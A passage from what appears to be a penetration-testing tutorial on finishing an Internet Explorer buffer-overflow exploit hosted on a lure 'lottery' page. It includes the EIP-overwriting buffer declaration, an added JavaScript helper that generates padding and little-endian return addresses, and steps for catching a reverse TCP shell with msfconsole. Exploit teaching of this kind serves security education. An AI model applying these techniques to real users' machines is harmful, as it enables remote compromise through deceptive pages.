Fine-tuning your attack and getting a shell

If you punched in the code from our setup as-is, then you put in too many z's, and calling exploit() simply crashes IE. We need to know exactly how many z's to write: enough to fill the buffer right up to the saved return address, so that we're left with exactly the four bytes needed to overwrite EIP. I'll leave it to you to find the right amount of padding. Here's a hint to get you started: 390 bytes is just shy of the sweet spot, but go beyond 395 bytes and you'll overshoot the landing.

Let's stop the web server so we can modify lottery.html. I'm changing the buffer declaration to concatenate the padding with our target address, written byte-reversed because x86 is little-endian: var buffer = "zzzz... [snip] ...zzzz" + "\xff\xff\xec\x11" (don't forget the endianness):
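As an added example (not code from the book), here is a small script that builds the buffer declaration from a padding length and a numeric target address, so the little-endian conversion is done by code rather than by hand and you can step through the hinted range of padding lengths without retyping the line. The address 0x11ecffff is an assumption obtained by reversing the four bytes shown above; the padding length in the usage line is a hypothetical pick from that range.

```javascript
// Added example, not from the book: build the lottery.html buffer declaration
// from a padding length and a numeric target address.
// ASSUMPTION: 0x11ecffff is the page's "\xff\xff\xec\x11" read back as a
// big-endian number; substitute whatever address your own setup needs.

// Encode a 32-bit address as four bytes, least significant byte first (x86 order).
function littleEndian(addr) {
  if (addr < 0 || addr > 0xffffffff) throw new RangeError("need a 32-bit address");
  var s = "";
  for (var i = 0; i < 4; i++) {
    s += String.fromCharCode((addr >>> (8 * i)) & 0xff);
  }
  return s;
}

// Render bytes as \xHH escapes, the form the page pastes into lottery.html.
function asEscapes(bytes) {
  var out = "";
  for (var i = 0; i < bytes.length; i++) {
    var h = bytes.charCodeAt(i).toString(16);
    out += "\\x" + (h.length < 2 ? "0" + h : h);
  }
  return out;
}

// padLen z's followed by the address. The overwrite lands on EIP only when
// padLen is exactly the distance from the start of the buffer to the saved
// return address; one short or one long and the address is misaligned.
function buildBuffer(padLen, addr) {
  return new Array(padLen + 1).join("z") + littleEndian(addr);
}

// Candidate padding lengths from the hint: tooShort bytes is just shy,
// anything beyond tooLong overshoots, so try every length in between.
function candidatePadLengths(tooShort, tooLong) {
  var c = [];
  for (var n = tooShort + 1; n <= tooLong; n++) c.push(n);
  return c;
}

// The source line to drop into lottery.html for a given padding length.
function bufferDeclaration(padLen, addr) {
  return 'var buffer = "' + new Array(padLen + 1).join("z") +
         '" + "' + asEscapes(littleEndian(addr)) + '";';
}

// Usage: print one declaration per candidate length (392 etc. are hypothetical picks).
var lengths = candidatePadLengths(390, 395);
for (var k = 0; k < lengths.length; k++) {
  console.log("// padding " + lengths[k] + ": " + bufferDeclaration(lengths[k], 0x11ecffff));
}
```

Paste the printed declaration for one candidate length into lottery.html in place of the existing buffer line, reload, and move to the next length if exploit() still crashes IE instead of returning a shell. Note that a \xHH escape in a JavaScript string literal is a single 16-bit code unit, so the block keeps the same \xHH form the page uses rather than switching to any other escape style.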

Save the file and fire up the SimpleHTTPServer again. The trap is set, but we have just one last step: we need a handler.

As with msfvenom, I expect this process to be second nature to you by now: fire up msfconsole and configure your reverse TCP handler. Make sure the handler's LPORT is the same port number you encoded into the shellcode with msfvenom; if the two differ, the payload will connect back to a port nobody is listening on and you'll never see a session:

You can see here that we received a session from the victim PC when our unfortunate user tried to claim the lottery winnings. Note the privileges: yes, we're stuck with whatever privileges Internet Explorer was running under, since our shellcode executes inside the browser process. Try experimenting with running IE under different user accounts and see what difference it makes for the attacker.
